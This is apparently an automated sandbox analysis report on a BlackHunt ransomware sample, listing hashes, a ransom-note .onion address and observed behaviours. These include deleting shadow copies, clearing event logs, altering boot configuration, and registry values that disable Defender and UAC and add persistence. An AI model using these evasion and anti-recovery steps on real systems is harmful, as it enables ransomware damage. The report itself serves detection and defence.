Analysis
-
max time kernel
23s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:51
Static task
static1
Behavioral task
behavioral1
Sample
c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe
Resource
win10v2004-20231222-en
General
-
Target
c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe
-
Size
707KB
-
MD5
af52cae924771b60f40485fd7cf64650
-
SHA1
4b2308c685d3db47892aedc2ea9bab02ed4c9a24
-
SHA256
c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f
-
SHA512
5980d847a4c419dc803d64027d4ce3451e0ef27e60b3aeb03d0a44362fbd631d1e477145bc47a7f65c7291e7d2ee9a42e60df59045f69bfbe495221094c9e913
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8Fvnh:6uaTmkZJ+naie5OTamgEoKxLWnhh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2360 fsutil.exe 1448 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2316 wevtutil.exe 2028 wevtutil.exe 1748 wevtutil.exe 2936 wevtutil.exe 1768 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1284 bcdedit.exe 2732 bcdedit.exe 2964 bcdedit.exe 2428 bcdedit.exe -
Renames multiple (2914) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1976 wbadmin.exe 764 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\P: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\L: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\Z: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\N: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\E: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\T: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\A: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\H: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\K: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\U: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\O: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\J: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\X: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\B: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\M: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\G: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\V: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\Q: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\W: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\R: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\LockConnect.jpg c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NavigationButtonSubpicture.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files (x86)\Google\Update\Download\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\UnblockResolve.ttc c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#BlackHunt_ReadMe.txt c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-imageMask.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#BlackHunt_Private.key c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#BlackHunt_ReadMe.hta c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2636 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1660 vssadmin.exe 556 vssadmin.exe 1192 vssadmin.exe 564 vssadmin.exe 2896 vssadmin.exe 1872 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2212 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2940 PING.EXE -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeRestorePrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeBackupPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeTakeOwnershipPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeAuditPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeSecurityPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeIncBasePriorityPrivilege 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe Token: SeBackupPrivilege 2312 vssvc.exe Token: SeRestorePrivilege 2312 vssvc.exe Token: SeAuditPrivilege 2312 vssvc.exe Token: SeBackupPrivilege 2384 wbengine.exe Token: SeRestorePrivilege 2384 wbengine.exe Token: SeSecurityPrivilege 2384 wbengine.exe Token: SeSecurityPrivilege 2316 wevtutil.exe Token: SeBackupPrivilege 2316 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1896 wrote to memory of 2636 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 155 PID 1896 wrote to memory of 2636 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 155 PID 1896 wrote to memory of 2636 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 155 PID 1896 wrote to memory of 2636 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 155 PID 1896 wrote to memory of 2796 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 153 PID 1896 wrote to memory of 2796 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 153 PID 1896 wrote to memory of 2796 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 153 PID 1896 wrote to memory of 2796 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 153 PID 2636 wrote to memory of 2820 2636 cmd.exe 151 PID 2636 wrote to memory of 2820 2636 cmd.exe 151 PID 2636 wrote to memory of 2820 2636 cmd.exe 151 PID 1896 wrote to memory of 2840 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 29 PID 1896 wrote to memory of 2840 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 29 PID 1896 wrote to memory of 2840 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 29 PID 1896 wrote to memory of 2840 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 29 PID 1896 wrote to memory of 2988 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 149 PID 1896 wrote to memory of 2988 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 149 PID 1896 wrote to memory of 2988 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 149 PID 1896 wrote to memory of 2988 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 149 PID 2796 wrote to memory of 2540 2796 cmd.exe 147 PID 2796 wrote to memory of 2540 2796 cmd.exe 147 PID 2796 wrote to memory of 2540 2796 cmd.exe 147 PID 1896 wrote to memory of 2244 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 146 PID 1896 wrote to memory of 2244 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 146 PID 1896 wrote to memory of 2244 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 146 PID 1896 wrote to memory of 2244 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 146 PID 1896 wrote to memory of 2844 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 144 PID 1896 wrote to memory of 2844 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 144 PID 1896 wrote to memory of 2844 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 144 PID 1896 wrote to memory of 2844 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 144 PID 1896 wrote to memory of 2744 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 143 PID 1896 wrote to memory of 2744 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 143 PID 1896 wrote to memory of 2744 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 143 PID 1896 wrote to memory of 2744 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 143 PID 2988 wrote to memory of 2752 2988 cmd.exe 30 PID 2988 wrote to memory of 2752 2988 cmd.exe 30 PID 2988 wrote to memory of 2752 2988 cmd.exe 30 PID 1896 wrote to memory of 2556 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 141 PID 1896 wrote to memory of 2556 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 141 PID 1896 wrote to memory of 2556 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 141 PID 1896 wrote to memory of 2556 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 141 PID 2840 wrote to memory of 2696 2840 cmd.exe 139 PID 2840 wrote to memory of 2696 2840 cmd.exe 139 PID 2840 wrote to memory of 2696 2840 cmd.exe 139 PID 1896 wrote to memory of 2700 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 138 PID 1896 wrote to memory of 2700 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 138 PID 1896 wrote to memory of 2700 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 138 PID 1896 wrote to memory of 2700 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 138 PID 1896 wrote to memory of 2544 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 172 PID 1896 wrote to memory of 2544 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 172 PID 1896 wrote to memory of 2544 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 172 PID 1896 wrote to memory of 2544 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 172 PID 1896 wrote to memory of 2604 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 31 PID 1896 wrote to memory of 2604 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 31 PID 1896 wrote to memory of 2604 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 31 PID 1896 wrote to memory of 2604 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 31 PID 2744 wrote to memory of 828 2744 cmd.exe 133 PID 2744 wrote to memory of 828 2744 cmd.exe 133 PID 2744 wrote to memory of 828 2744 cmd.exe 133 PID 1896 wrote to memory of 1968 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 132 PID 1896 wrote to memory of 1968 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 132 PID 1896 wrote to memory of 1968 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 132 PID 1896 wrote to memory of 1968 1896 c79c2250c219966af388faab89f6f6ff0f7a8befd85b4ceeb9a45d946a93312f.exe 132 PID 2244 wrote to memory of 2832 2244 cmd.exe 131 -
System policy modification 1 TTPs 3 IoCs
